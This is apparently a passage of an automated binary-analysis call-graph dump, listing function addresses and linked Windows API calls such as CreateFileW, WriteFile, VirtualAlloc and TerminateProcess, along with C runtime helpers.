ad9b9c 59 API calls Mailbox 99546->99905 99922 b4cdf1 99547->99922 99549 b4e25b 99549->99461 99551 b4cdf1 130 API calls 99550->99551 99552 b4e247 99551->99552 99552->99461 99554 ad9997 84 API calls 99553->99554 99555 b44787 99554->99555 100023 ad63a0 99555->100023 99557 b44797 99558 b447bc 99557->99558 99559 ada000 331 API calls 99557->99559 99560 ad9bf8 59 API calls 99558->99560 99561 b447c0 99558->99561 99559->99558 99560->99561 99561->99461 99563 b3d310 99562->99563 99564 b3d305 99562->99564 99565 b3d3ea Mailbox 99563->99565 99568 ad77c7 59 API calls 99563->99568 100062 ad9c9c 59 API calls 99564->100062 99567 af0ff6 Mailbox 59 API calls 99565->99567 99606 b3d3f3 Mailbox 99565->99606 99569 b3d433 99567->99569 99570 b3d334 99568->99570 99571 b3d43f 99569->99571 100119 ad5906 60 API calls Mailbox 99569->100119 99572 ad77c7 59 API calls 99570->99572 99574 ad9997 84 API calls 99571->99574 99575 b3d33d 99572->99575 99576 b3d457 99574->99576 99577 ad9997 84 API calls 99575->99577 99578 ad5956 67 API calls 99576->99578 99579 b3d349 99577->99579 99580 b3d466 99578->99580 100063 ad46f9 99579->100063 99582 b3d46a GetLastError 99580->99582 99583 b3d49e 99580->99583 99585 b3d483 99582->99585 99587 b3d500 99583->99587 99588 b3d4c9 99583->99588 99584 b3d35e 99586 ad7c8e 59 API calls 99584->99586 99585->99606 100120 ad5a1a CloseHandle 99585->100120 99589 b3d391 99586->99589 99592 af0ff6 Mailbox 59 API calls 99587->99592 99590 af0ff6 Mailbox 59 API calls 99588->99590 99591 b3d3e3 99589->99591 100114 b33e73 99589->100114 99594 b3d4ce 99590->99594 100118 ad9c9c 59 API calls 99591->100118 99593 b3d505 99592->99593 99600 ad77c7 59 API calls 99593->99600 99593->99606 99598 b3d4df 99594->99598 99601 ad77c7 59 API calls 99594->99601 100121 b3f835 59 API calls 2 library calls 99598->100121 99600->99606 99601->99598 99602 b3d3a5 99603 ad7f41 59 API calls 99602->99603 99605 b3d3b2 99603->99605 100117 b33c66 63 API calls Mailbox 99605->100117 99606->99461 99608 b3d3bb Mailbox 99608->99591 99610 ad77c7 59 API calls 99609->99610 99611 b4c608 99610->99611 99612 ad77c7 59 API calls 99611->99612 99613 b4c610 99612->99613 99614 ad77c7 59 API calls 99613->99614 99615 b4c618 99614->99615 99616 ad9997 84 API calls 99615->99616 99629 b4c626 99616->99629 99617 ad7d2c 59 API calls 99617->99629 99618 ad7a84 59 API calls 99618->99629 99619 b4c80f 99620 b4c83c Mailbox 99619->99620 100132 ad9b9c 59 API calls Mailbox 99619->100132 99620->99450 99622 b4c7f6 99624 ad7e0b 59 API calls 99622->99624 99623 b4c811 99625 ad7e0b 59 API calls 99623->99625 99627 b4c803 99624->99627 99628 b4c820 99625->99628 99626 ad81a7 59 API calls 99626->99629 99631 ad7c8e 59 API calls 99627->99631 99632 ad7c8e 59 API calls 99628->99632 99629->99617 99629->99618 99629->99619 99629->99620 99629->99622 99629->99623 99629->99626 99630 ad7faf 59 API calls 99629->99630 99633 ad7faf 59 API calls 99629->99633 99638 ad9997 84 API calls 99629->99638 99639 ad7c8e 59 API calls 99629->99639 99640 ad7e0b 59 API calls 99629->99640 99634 b4c6bd CharUpperBuffW 99630->99634 99631->99619 99632->99619 99635 b4c77d CharUpperBuffW 99633->99635 100130 ad859a 68 API calls 99634->100130 100131 adc707 69 API calls 2 library calls 99635->100131 99638->99629 99639->99629 99640->99629 99642 b37bec 99641->99642 99643 af0ff6 Mailbox 59 API calls 99642->99643 99644 b37bfa 99643->99644 99645 b37c08 99644->99645 99646 ad77c7 59 API calls 99644->99646 99645->99450 99646->99645 99648 b4bfc5 99647->99648 99649 b4bfab 99647->99649 100134 b4a528 59 API calls Mailbox 99648->100134 100133 b3a0b5 89 API calls 4 library calls 99649->100133 99652 b4bfd0 99653 ada000 330 API calls 99652->99653 99654 b4c031 99653->99654 99655 b4bfbd Mailbox 99654->99655 99656 b4c0c3 99654->99656 99659 b4c072 99654->99659 99655->99450 99657 b4c119 99656->99657 99658 b4c0c9 99656->99658 99657->99655 99660 ad9997 84 API calls 99657->99660 100155 b37ba4 59 API calls 99658->100155 100135 b37581 59 API calls Mailbox 99659->100135 99661 b4c12b 99660->99661 99664 ad7faf 59 API calls 99661->99664 99667 b4c14f CharUpperBuffW 99664->99667 99665 b4c0ec 100156 ad5ea1 59 API calls Mailbox 99665->100156 99666 b4c0a2 100136 adf5c0 99666->100136 99671 b4c169 99667->99671 99670 b4c0f4 Mailbox 100157 adfe40 331 API calls 2 library calls 99670->100157 99672 b4c1bc 99671->99672 99675 b4c170 99671->99675 99674 ad9997 84 API calls 99672->99674 99676 b4c1c4 99674->99676 100158 b37581 59 API calls Mailbox 99675->100158 100159 ad9fbd 60 API calls 99676->100159 99679 b4c19e 99680 adf5c0 330 API calls 99679->99680 99680->99655 99681 b4c1ce 99681->99655 99682 ad9997 84 API calls 99681->99682 99683 b4c1e9 99682->99683 100160 ad5ea1 59 API calls Mailbox 99683->100160 99685 b4c1f9 100161 adfe40 331 API calls 2 library calls 99685->100161 101225 b26636 99687->101225 99689 b26702 99689->99450 99690->99437 99691->99437 99694 ad9dfb 99692->99694 99693 ad9e32 99693->99461 99694->99693 101230 ad8e34 59 API calls Mailbox 99694->101230 99696 ad9e5d 99696->99461 99697->99455 99698->99444 99699->99458 99700->99450 99701->99450 99702->99450 99703->99461 99704->99431 99705->99452 99706->99452 99707->99432 99708->99441 99709->99432 99711 ad9c08 99710->99711 99712 b0fbff 99710->99712 99717 af0ff6 Mailbox 59 API calls 99711->99717 99713 b0fc10 99712->99713 99714 ad7d2c 59 API calls 99712->99714 99715 ad7eec 59 API calls 99713->99715 99714->99713 99716 b0fc1a 99715->99716 99720 ad77c7 59 API calls 99716->99720 99722 ad9c34 99716->99722 99718 ad9c1b 99717->99718 99718->99716 99719 ad9c26 99718->99719 99721 ad7f41 59 API calls 99719->99721 99719->99722 99720->99722 99721->99722 99722->99472 99722->99477 99787 ad5c4e 99723->99787 99726 ad5c4e 2 API calls 99727 ad5e74 99726->99727 99727->99490 99729 ad56dd 99728->99729 99730 ad5702 99728->99730 99729->99730 99734 ad56ec 99729->99734 99731 ad7eec 59 API calls 99730->99731 99732 b3349a 99731->99732 99736 b334c9 99732->99736 99797 b33436 ReadFile SetFilePointerEx 99732->99797 99798 ad7a84 59 API calls 2 library calls 99732->99798 99799 ad5c18 99734->99799 99736->99500 99742 b335d8 Mailbox 99742->99500 99743->99475 99745 ad99b1 99744->99745 99753 ad99ab 99744->99753 99746 ad99f9 99745->99746 99747 ad99b7 __itow 99745->99747 99751 b0f9fc __i64tow 99745->99751 99754 b0f903 99745->99754 99827 af38d8 83 API calls 3 library calls 99746->99827 99750 af0ff6 Mailbox 59 API calls 99747->99750 99752 ad99d1 99750->99752 99752->99753 99756 ad7f41 59 API calls 99752->99756 99762 ad5956 99753->99762 99755 af0ff6 Mailbox 59 API calls 99754->99755 99760 b0f97b Mailbox _wcscpy 99754->99760 99757 b0f948 99755->99757 99756->99753 99758 af0ff6 Mailbox 59 API calls 99757->99758 99759 b0f96e 99758->99759 99759->99760 99761 ad7f41 59 API calls 99759->99761 99828 af38d8 83 API calls 3 library calls 99760->99828 99761->99760 99763 ad5dcf CloseHandle 99762->99763 99764 ad5962 99763->99764 99829 ad5df9 99764->99829 99766 ad59a4 99766->99476 99766->99477 99781 ad5a1a CloseHandle 99766->99781 99767 ad5981 99767->99766 99837 ad5770 99767->99837 99769 ad5993 99854 ad53db SetFilePointerEx SetFilePointerEx 99769->99854 99771 ad599a 99771->99766 99772 b0e030 99771->99772 99855 b33696 SetFilePointerEx SetFilePointerEx WriteFile 99772->99855 99774 b0e060 99774->99766 99775->99504 99777 ad5dd9 99776->99777 99778 ad5de8 99776->99778 99777->99505 99780 ad5a1a CloseHandle 99777->99780 99778->99777 99779 ad5ded CloseHandle 99778->99779 99779->99777 99780->99505 99781->99477 99782->99477 99783->99482 99784->99490 99785->99498 99786->99503 99788 ad5c68 99787->99788 99789 ad5cef SetFilePointerEx 99788->99789 99790 b0e151 99788->99790 99794 ad5cc3 99788->99794 99795 ad5dae SetFilePointerEx 99789->99795 99796 ad5dae SetFilePointerEx 99790->99796 99793 b0e16b 99794->99726 99795->99794 99796->99793 99797->99732 99798->99732 99800 af0ff6 Mailbox 59 API calls 99799->99800 99801 ad5c2b 99800->99801 99802 af0ff6 Mailbox 59 API calls 99801->99802 99803 ad5c37 99802->99803 99804 ad5632 99803->99804 99811 ad5a2f 99804->99811 99807 ad5643 99808 ad5674 99807->99808 99818 ad5d20 99807->99818 99824 ad5bda 59 API calls 2 library calls 99807->99824 99808->99742 99810 ad793a 61 API calls Mailbox 99808->99810 99810->99742 99812 b0e065 99811->99812 99813 ad5a40 99811->99813 99825 b26443 59 API calls Mailbox 99812->99825 99813->99807 99815 b0e06f 99816 af0ff6 Mailbox 59 API calls 99815->99816 99817 b0e07b 99816->99817 99819 ad5d93 99818->99819 99823 ad5d2e 99818->99823 99826 ad5dae SetFilePointerEx 99819->99826 99820 ad5d56 99820->99807 99822 ad5d66 ReadFile 99822->99820 99822->99823 99823->99820 99823->99822 99824->99807 99825->99815 99826->99823 99827->99747 99828->99751 99830 b0e181 99829->99830 99831 ad5e12 CreateFileW 99829->99831 99832 ad5e34 99830->99832 99833 b0e187 CreateFileW 99830->99833 99831->99832 99832->99767 99833->99832 99834 b0e1ad 99833->99834 99835 ad5c4e 2 API calls 99834->99835 99836 b0e1b8 99835->99836 99836->99832 99838 ad578b 99837->99838 99839 b0dfce 99837->99839 99840 ad5c4e 2 API calls 99838->99840 99853 ad581a 99838->99853 99842 ad5e3f 2 API calls 99839->99842 99839->99853 99841 ad57ad 99840->99841 99843 ad538e 59 API calls 99841->99843 99842->99853 99844 ad57b7 99843->99844 99844->99839 99845 ad57c4 99844->99845 99846 af0ff6 Mailbox 59 API calls 99845->99846 99847 ad57cf 99846->99847 99848 ad538e 59 API calls 99847->99848 99849 ad57da 99848->99849 99850 ad5d20 2 API calls 99849->99850 99851 ad5807 99850->99851 99852 ad5c4e 2 API calls 99851->99852 99852->99853 99853->99769 99854->99771 99855->99774 99857 af0ff6 Mailbox 59 API calls 99856->99857 99858 ad7b9b 99857->99858 99859 ad8189 59 API calls 99858->99859 99860 ad7baa 99859->99860 99860->99516 99862 ad77c7 59 API calls 99861->99862 99863 b2f905 99862->99863 99864 ad7b76 59 API calls 99863->99864 99865 b2f919 99864->99865 99866 b2f658 61 API calls 99865->99866 99869 b2f93b 99865->99869 99867 b2f935 99866->99867 99867->99869 99870 ad79ab 59 API calls 99867->99870 99871 ad79ab 59 API calls 99869->99871 99874 ad7c8e 59 API calls 99869->99874 99878 b2f9b5 99869->99878 99906 b2f658 99869->99906 99870->99869 99871->99869 99872 ad79ab 59 API calls 99873 b2f9ce 99872->99873 99875 ad7c8e 59 API calls 99873->99875 99874->99869 99876 b2f9da 99875->99876 99877 ad80d7 59 API calls 99876->99877 99879 b2f9e9 Mailbox 99876->99879 99877->99879 99878->99872 99879->99546 99880->99523 99882 ad79ba 99881->99882 99883 ad7a17 99881->99883 99882->99883 99885 ad79c5 99882->99885 99884 ad7e8c 59 API calls 99883->99884 99890 ad79e8 _memmove 99884->99890 99886 b0ef32 99885->99886 99887 ad79e0 99885->99887 99889 ad8189 59 API calls 99886->99889 99888 ad8087 59 API calls 99887->99888 99888->99890 99891 b0ef3c 99889->99891 99890->99536 99892 af0ff6 Mailbox 59 API calls 99891->99892 99893 b0ef5c 99892->99893 99895 b0f094 99894->99895 99896 ad7ca0 99894->99896 99921 b28123 59 API calls _memmove 99895->99921 99915 ad7bb1 99896->99915 99899 ad7cac 99899->99541 99900 b0f09e 99901 ad81a7 59 API calls 99900->99901 99902 b0f0a6 Mailbox 99901->99902 99903->99532 99904->99531 99905->99544 99907 b2f683 __wsetenvp 99906->99907 99908 b2f769 99907->99908 99909 b2f6b8 99907->99909 99912 b2f6c2 99907->99912 99908->99912 99914 ad7a24 61 API calls 99908->99914 99909->99912 99913 ad7a24 61 API calls 99909->99913 99912->99869 99913->99909 99914->99908 99916 ad7bbf 99915->99916 99920 ad7be5 _memmove 99915->99920 99917 af0ff6 Mailbox 59 API calls 99916->99917 99916->99920 99918 ad7c34 99917->99918 99919 af0ff6 Mailbox 59 API calls 99918->99919 99919->99920 99920->99899 99921->99900 99923 ad9997 84 API calls 99922->99923 99924 b4ce2e 99923->99924 99928 b4ce75 Mailbox 99924->99928 99960 b4dab9 99924->99960 99926 b4d242 100010 b4dbdc 92 API calls Mailbox 99926->100010 99928->99549 99930 b4d251 99932 b4d0db 99930->99932 99933 b4d25d 99930->99933 99931 b4cec6 Mailbox 99931->99928 99934 ad9997 84 API calls 99931->99934 99947 b4d0cd 99931->99947 99992 b3f835 59 API calls 2 library calls 99931->99992 99993 b4d2f3 61 API calls 2 library calls 99931->99993 99973 b4cc82 99932->99973 99933->99928 99934->99931 99939 b4d114 99988 af0e48 99939->99988 99942 b4d147 99995 ad942e 99942->99995 99943 b4d12e 99994 b3a0b5 89 API calls 4 library calls 99943->99994 99946 b4d139 GetCurrentProcess TerminateProcess 99946->99942 99947->99926 99947->99932 99952 b4d2b8 99952->99928 99955 b4d2cc FreeLibrary 99952->99955 99953 b4d17f 100007 b4d95d 107 API calls _free 99953->100007 99955->99928 99959 b4d190 99959->99952 100008 ad8ea0 59 API calls Mailbox 99959->100008 100009 ad9e9c 60 API calls Mailbox 99959->100009 100011 b4d95d 107 API calls _free 99959->100011 99961 ad7faf 59 API calls 99960->99961 99962 b4dad4 CharLowerBuffW 99961->99962 99963 b2f658 61 API calls 99962->99963 99964 b4daf5 99963->99964 99966 ad77c7 59 API calls 99964->99966 99972 b4db30 Mailbox 99964->99972 99967 b4db0d 99966->99967 99968 ad79ab 59 API calls 99967->99968 99969 b4db24 99968->99969 99970 ad7e8c 59 API calls 99969->99970 99970->99972 99971 b4db6c Mailbox 99971->99931 99972->99971 100012 b4d2f3 61 API calls 2 library calls 99972->100012 99974 b4cc9d 99973->99974 99978 b4ccf2 99973->99978 99975 af0ff6 Mailbox 59 API calls 99974->99975 99977 b4ccbf 99975->99977 99976 af0ff6 Mailbox 59 API calls 99976->99977 99977->99976 99977->99978 99979 b4dd64 99978->99979 99980 b4df8d Mailbox 99979->99980 99987 b4dd87 _strcat _wcscpy __wsetenvp 99979->99987 99980->99939 99981 ad9cf8 59 API calls 99981->99987 99982 ad9d46 59 API calls 99982->99987 99983 ad9c9c 59 API calls 99983->99987 99984 af594c 58 API calls __crtGetStringTypeA_stat 99984->99987 99985 ad9997 84 API calls 99985->99987 99987->99980 99987->99981 99987->99982 99987->99983 99987->99984 99987->99985 100013 b35b29 61 API calls 2 library calls 99987->100013 99989 af0e5d 99988->99989 99990 af0ef5 VirtualAlloc 99989->99990 99991 af0ec3 99989->99991 99990->99991 99991->99942 99991->99943 99992->99931 99993->99931 99994->99946 99996 ad9436 99995->99996 99997 af0ff6 Mailbox 59 API calls 99996->99997 99998 ad9444 99997->99998 99999 ad9450 99998->99999 100014 ad935c 59 API calls Mailbox 99998->100014 100001 ad91b0 99999->100001 100015 ad92c0 100001->100015 100003 ad91bf 100004 af0ff6 Mailbox 59 API calls 100003->100004 100005 ad925b 100003->100005 100004->100005 100005->99959 100006 ad8ea0 59 API calls Mailbox 100005->100006 100006->99953 100007->99959 100008->99959 100009->99959 100010->99930 100011->99959 100012->99971 100013->99987 100014->99999 100016 ad92c9 Mailbox 100015->100016 100017 b0f5c8 100016->100017 100022 ad92d3 100016->100022 100018 af0ff6 Mailbox 59 API calls 100017->100018 100020 b0f5d4 100018->100020 100019 ad92da 100019->100003 100021 ad9df0 Mailbox 59 API calls 100021->100022 100022->100019 100022->100021 100024 ad7b76 59 API calls 100023->100024 100035 ad63c5 100024->100035 100025 ad65ca 100050 ad766f 100025->100050 100027 ad65e4 Mailbox 100027->99557 100030 ad68f9 _memmove 100061 b2fdba 91 API calls 4 library calls 100030->100061 100031 ad766f 59 API calls 100031->100035 100032 b0e41f 100060 b2fdba 91 API calls 4 library calls 100032->100060 100034 b0e42d 100039 ad766f 59 API calls 100034->100039 100035->100025 100035->100030 100035->100031 100035->100032 100038 ad7eec 59 API calls 100035->100038 100041 b0e3bb 100035->100041 100044 ad7faf 59 API calls 100035->100044 100048 ad60cc 60 API calls 100035->100048 100049 ad5ea1 59 API calls Mailbox 100035->100049 100058 ad5fd2 60 API calls 100035->100058 100059 ad7a84 59 API calls 2 library calls 100035->100059 100038->100035 100040 b0e443 100039->100040 100040->100027 100042 ad8189 59 API calls 100041->100042 100043 b0e3c6 100042->100043 100047 af0ff6 Mailbox 59 API calls 100043->100047 100046 ad659b CharUpperBuffW 100044->100046 100046->100035 100047->100030 100048->100035 100049->100035 100051 ad770f 100050->100051 100054 ad7682 _memmove 100050->100054 100053 af0ff6 Mailbox 59 API calls 100051->100053 100052 af0ff6 Mailbox 59 API calls 100055 ad7689 100052->100055 100053->100054 100054->100052 100056 af0ff6 Mailbox 59 API calls 100055->100056 100057 ad76b2 100055->100057 100056->100057 100057->100027 100058->100035 100059->100035 100060->100034 100061->100027 100062->99563 100064 ad77c7 59 API calls 100063->100064 100065 ad470f 100064->100065 100066 ad77c7 59 API calls 100065->100066 100067 ad4717 100066->100067 100068 ad77c7 59 API calls 100067->100068 100069 ad471f 100068->100069 100070 ad77c7 59 API calls 100069->100070 100071 ad4727 100070->100071 100072 ad475b 100071->100072 100073 b0d8fb 100071->100073 100074 ad79ab 59 API calls 100072->100074 100075 ad81a7 59 API calls 100073->100075 100076 ad4769 100074->100076 100077 b0d904 100075->100077 100078 ad7e8c 59 API calls 100076->100078 100079 ad7eec 59 API calls 100077->100079 100080 ad4773 100078->100080 100082 ad479e 100079->100082 100081 ad79ab 59 API calls 100080->100081 100080->100082 100085 ad4794 100081->100085 100083 ad47de 100082->100083 100086 ad47bd 100082->100086 100096 b0d924 100082->100096 100084 ad79ab 59 API calls 100083->100084 100087 ad47ef 100084->100087 100088 ad7e8c 59 API calls 100085->100088 100122 ad7b52 100086->100122 100091 ad4801 100087->100091 100094 ad81a7 59 API calls 100087->100094 100088->100082 100089 b0d9f4 100092 ad7d2c 59 API calls 100089->100092 100095 ad4811 100091->100095 100098 ad81a7 59 API calls 100091->100098 100109 b0d9b1 100092->100109 100094->100091 100100 ad4818 100095->100100 100101 ad81a7 59 API calls 100095->100101 100096->100089 100099 b0d9dd 100096->100099 100104 b0d95b 100096->100104 100097 ad79ab 59 API calls 100097->100083 100098->100095 100099->100089 100103 b0d9c8 100099->100103 100102 ad81a7 59 API calls 100100->100102 100111 ad481f Mailbox 100100->100111 100101->100100 100102->100111 100106 ad7d2c 59 API calls 100103->100106 100105 b0d9b9 100104->100105 100112 b0d9a4 100104->100112 100107 ad7d2c 59 API calls 100105->100107 100106->100109 100107->100109 100108 ad7b52 59 API calls 100108->100109 100109->100083 100109->100108 100125 ad7a84 59 API calls 2 library calls 100109->100125 100111->99584 100113 ad7d2c 59 API calls 100112->100113 100113->100109 100126 b34696 GetFileAttributesW 100114->100126 100117->99608 100118->99565 100119->99571 100120->99606 100121->99606 100123 ad7faf 59 API calls 100122->100123 100124 ad47c7 100123->100124 100124->100083 100124->100097 100125->100109 100127 b33e7a 100126->100127 100128 b346b1 FindFirstFileW 100126->100128 100127->99591 100127->99602 100128->100127 100129 b346c6 FindClose 100128->100129 100129->100127 100130->99629 100131->99629 100132->99620 100133->99655 100134->99652 100135->99666 100137 adf61a 100136->100137 100138 adf7b0 100136->100138 100139 b14848 100137->100139 100140 adf626 100137->100140 100141 ad7f41 59 API calls 100138->100141 100142 b4bf80 331 API calls 100139->100142 100248 adf3f0 331 API calls 2 library calls 100140->100248 100147 adf6ec Mailbox 100141->100147 100144 b14856 100142->100144 100148 adf790 100144->100148 100249 b3a0b5 89 API calls 4 library calls 100144->100249 100146 adf65d 100146->100144 100146->100147 100146->100148 100150 adf743 100147->100150 100151 b33e73 3 API calls 100147->100151 100154 b4474d 331 API calls 100147->100154 100162 ad4faa 100147->100162 100168 b3cde5 100147->100168 100148->99655 100149 ad9df0 Mailbox 59 API calls 100149->100150 100150->100148 100150->100149 100151->100150 100154->100150 100155->99665 100156->99670 100157->99655 100158->99679 100159->99681 100160->99685 100161->99655 100163 ad4fb4 100162->100163 100165 ad4fbb 100162->100165 100250 af55d6 100163->100250 100166 ad4fdb FreeLibrary 100165->100166 100167 ad4fca 100165->100167 100166->100167 100167->100150 100169 ad77c7 59 API calls 100168->100169 100170 b3ce1a 100169->100170 100171 ad77c7 59 API calls 100170->100171 100172 b3ce23 100171->100172 100173 b3ce37 100172->100173 100657 ad9c9c 59 API calls 100172->100657 100175 ad9997 84 API calls 100173->100175 100176 b3ce54 100175->100176 100177 b3ce76 100176->100177 100178 b3cf55 100176->100178 100183 b3cf85 Mailbox 100176->100183 100179 ad9997 84 API calls 100177->100179 100524 ad4f3d 100178->100524 100181 b3ce82 100179->100181 100184 ad81a7 59 API calls 100181->100184 100183->100150 100187 b3ce8e 100184->100187 100185 b3cf81 100185->100183 100186 ad77c7 59 API calls 100185->100186 100189 b3cfb6 100186->100189 100192 b3cea2 100187->100192 100193 b3ced4 100187->100193 100188 ad4f3d 136 API calls 100188->100185 100190 ad77c7 59 API calls 100189->100190 100191 b3cfbf 100190->100191 100195 ad77c7 59 API calls 100191->100195 100196 ad81a7 59 API calls 100192->100196 100194 ad9997 84 API calls 100193->100194 100198 b3cee1 100194->100198 100199 b3cfc8 100195->100199 100197 b3ceb2 100196->100197 100200 ad7e0b 59 API calls 100197->100200 100201 ad81a7 59 API calls 100198->100201 100202 ad77c7 59 API calls 100199->100202 100203 b3cebc 100200->100203 100204 b3ceed 100201->100204 100205 b3cfd1 100202->100205 100206 ad9997 84 API calls 100203->100206 100658 b34cd3 GetFileAttributesW 100204->100658 100208 ad9997 84 API calls 100205->100208 100209 b3cec8 100206->100209 100211 b3cfde 100208->100211 100212 ad7c8e 59 API calls 100209->100212 100210 b3cef6 100213 b3cf09 100210->100213 100217 ad7b52 59 API calls 100210->100217 100214 ad46f9 59 API calls 100211->100214 100212->100193 100216 ad9997 84 API calls 100213->100216 100224 b3cf0f 100213->100224 100215 b3cff9 100214->100215 100218 ad7b52 59 API calls 100215->100218 100219 b3cf36 100216->100219 100217->100213 100220 b3d008 100218->100220 100659 b33a2b 75 API calls Mailbox 100219->100659 100222 b3d03c 100220->100222 100223 ad7b52 59 API calls 100220->100223 100225 ad81a7 59 API calls 100222->100225 100226 b3d019 100223->100226 100224->100183 100227 b3d04a 100225->100227 100226->100222 100229 ad7d2c 59 API calls 100226->100229 100228 ad7c8e 59 API calls 100227->100228 100230 b3d058 100228->100230 100231 b3d02e 100229->100231 100232 ad7c8e 59 API calls 100230->100232 100234 ad7d2c 59 API calls 100231->100234 100233 b3d066 100232->100233 100235 ad7c8e 59 API calls 100233->100235 100234->100222 100236 b3d074 100235->100236 100237 ad9997 84 API calls 100236->100237 100238 b3d080 100237->100238 100548 b342ad 100238->100548 100240 b3d091 100241 b33e73 3 API calls 100240->100241 100242 b3d09b 100241->100242 100243 ad9997 84 API calls 100242->100243 100246 b3d0cc 100242->100246 100244 b3d0b9 100243->100244 100602 b393df 100244->100602 100247 ad4faa 84 API calls 100246->100247 100247->100183 100248->100146 100249->100148 100251 af55e2 _fprintf 100250->100251 100252 af560e 100251->100252 100253 af55f6 100251->100253 100259 af5606 _fprintf 100252->100259 100263 af6e4e 100252->100263 100285 af8d68 58 API calls __getptd_noexit 100253->100285 100255 af55fb 100286 af8ff6 9 API calls _fprintf 100255->100286 100259->100165 100264 af6e5e 100263->100264 100265 af6e80 EnterCriticalSection 100263->100265 100264->100265 100267 af6e66 100264->100267 100266 af5620 100265->100266 100269 af556a 100266->100269 100268 af9e4b __lock 58 API calls 100267->100268 100268->100266 100270 af558d 100269->100270 100271 af5579 100269->100271 100283 af5589 100270->100283 100288 af4c6d 100270->100288 100331 af8d68 58 API calls __getptd_noexit 100271->100331 100273 af557e 100332 af8ff6 9 API calls _fprintf 100273->100332 100280 af55a7 100305 b00c52 100280->100305 100282 af55ad 100282->100283 100284 af2f95 _free 58 API calls 100282->100284 100287 af5645 LeaveCriticalSection LeaveCriticalSection __wfsopen 100283->100287 100284->100283 100285->100255 100286->100259 100287->100259 100289 af4c80 100288->100289 100290 af4ca4 100288->100290 100289->100290 100291 af4916 _fprintf 58 API calls 100289->100291 100294 b00dc7 100290->100294 100292 af4c9d 100291->100292 100333 afdac6 100292->100333 100295 af55a1 100294->100295 100296 b00dd4 100294->100296 100298 af4916 100295->100298 100296->100295 100297 af2f95 _free 58 API calls 100296->100297 100297->100295 100299 af4935 100298->100299 100300 af4920 100298->100300 100299->100280 100479 af8d68 58 API calls __getptd_noexit 100300->100479 100302 af4925 100480 af8ff6 9 API calls _fprintf 100302->100480 100304 af4930 100304->100280 100306 b00c5e _fprintf 100305->100306 100307 b00c82 100306->100307 100308 b00c6b 100306->100308 100310 b00d0d 100307->100310 100312 b00c92 100307->100312 100496 af8d34 58 API calls __getptd_noexit 100308->100496 100501 af8d34 58 API calls __getptd_noexit 100310->100501 100311 b00c70 100497 af8d68 58 API calls __getptd_noexit 100311->100497 100315 b00cb0 100312->100315 100316 b00cba 100312->100316 100498 af8d34 58 API calls __getptd_noexit 100315->100498 100319 afd446 ___lock_fhandle 59 API calls 100316->100319 100317 b00cb5 100502 af8d68 58 API calls __getptd_noexit 100317->100502 100321 b00cc0 100319->100321 100323 b00cd3 100321->100323 100324 b00cde 100321->100324 100322 b00d19 100503 af8ff6 9 API calls _fprintf 100322->100503 100481 b00d2d 100323->100481 100499 af8d68 58 API calls __getptd_noexit 100324->100499 100328 b00c77 _fprintf 100328->100282 100329 b00cd9 100500 b00d05 LeaveCriticalSection __unlock_fhandle 100329->100500 100331->100273 100332->100283 100334 afdad2 _fprintf 100333->100334 100335 afdadf 100334->100335 100336 afdaf6 100334->100336 100434 af8d34 58 API calls __getptd_noexit 100335->100434 100338 afdb95 100336->100338 100340 afdb0a 100336->100340 100440 af8d34 58 API calls __getptd_noexit 100338->100440 100339 afdae4 100435 af8d68 58 API calls __getptd_noexit 100339->100435 100343 afdb28 100340->100343 100344 afdb32 100340->100344 100436 af8d34 58 API calls __getptd_noexit 100343->100436 100361 afd446 100344->100361 100345 afdb2d 100441 af8d68 58 API calls __getptd_noexit 100345->100441 100348 afdb38 100350 afdb5e 100348->100350 100351 afdb4b 100348->100351 100437 af8d68 58 API calls __getptd_noexit 100350->100437 100370 afdbb5 100351->100370 100352 afdba1 100442 af8ff6 9 API calls _fprintf 100352->100442 100356 afdaeb _fprintf 100356->100290 100357 afdb57 100439 afdb8d LeaveCriticalSection __unlock_fhandle 100357->100439 100358 afdb63 100438 af8d34 58 API calls __getptd_noexit 100358->100438 100362 afd452 _fprintf 100361->100362 100363 afd4a1 EnterCriticalSection 100362->100363 100364 af9e4b __lock 58 API calls 100362->100364 100365 afd4c7 _fprintf 100363->100365 100366 afd477 100364->100366 100365->100348 100367 afd48f 100366->100367 100443 afa06b InitializeCriticalSectionAndSpinCount 100366->100443 100444 afd4cb LeaveCriticalSection _doexit 100367->100444 100371 afdbc2 __write_nolock 100370->100371 100372 afdc01 100371->100372 100373 afdc20 100371->100373 100401 afdbf6 100371->100401 100454 af8d34 58 API calls __getptd_noexit 100372->100454 100377 afdc78 100373->100377 100378 afdc5c 100373->100378 100376 afdc06 100455 af8d68 58 API calls __getptd_noexit 100376->100455 100381 afdc91 100377->100381 100460 b01b11 60 API calls 3 library calls 100377->100460 100457 af8d34 58 API calls __getptd_noexit 100378->100457 100379 afe416 100379->100357 100445 b05ebb 100381->100445 100383 afdc0d 100456 af8ff6 9 API calls _fprintf 100383->100456 100386 afdc61 100458 af8d68 58 API calls __getptd_noexit 100386->100458 100388 afdc9f 100390 afdff8 100388->100390 100461 af9bec 58 API calls 2 library calls 100388->100461 100392 afe38b WriteFile 100390->100392 100393 afe016 100390->100393 100391 afdc68 100459 af8ff6 9 API calls _fprintf 100391->100459 100396 afdfeb GetLastError 100392->100396 100403 afdfb8 100392->100403 100397 afe13a 100393->100397 100406 afe02c 100393->100406 100396->100403 100407 afe145 100397->100407 100411 afe22f 100397->100411 100398 afdccb GetConsoleMode 100398->100390 100400 afdd0a 100398->100400 100399 afe3c4 100399->100401 100466 af8d68 58 API calls __getptd_noexit 100399->100466 100400->100390 100404 afdd1a GetConsoleCP 100400->100404 100468 afc836 100401->100468 100403->100399 100403->100401 100410 afe118 100403->100410 100404->100399 100428 afdd49 100404->100428 100405 afe09b WriteFile 100405->100396 100408 afe0d8 100405->100408 100406->100399 100406->100405 100407->100399 100412 afe1aa WriteFile 100407->100412 100408->100406 100413 afe0fc 100408->100413 100409 afe3f2 100467 af8d34 58 API calls __getptd_noexit 100409->100467 100415 afe3bb 100410->100415 100416 afe123 100410->100416 100411->100399 100417 afe2a4 WideCharToMultiByte 100411->100417 100412->100396 100418 afe1f9 100412->100418 100413->100403 100465 af8d47 58 API calls 3 library calls 100415->100465 100463 af8d68 58 API calls __getptd_noexit 100416->100463 100417->100396 100426 afe2eb 100417->100426 100418->100403 100418->100407 100418->100413 100421 afe2f3 WriteFile 100424 afe346 GetLastError 100421->100424 100421->100426 100422 afe128 100464 af8d34 58 API calls __getptd_noexit 100422->100464 100424->100426 100426->100403 100426->100411 100426->100413 100426->100421 100427 b07cae WriteConsoleW CreateFileW __putwch_nolock 100432 afde9f 100427->100432 100428->100403 100429 b0650a 60 API calls __write_nolock 100428->100429 100430 afde32 WideCharToMultiByte 100428->100430 100428->100432 100462 af3835 58 API calls 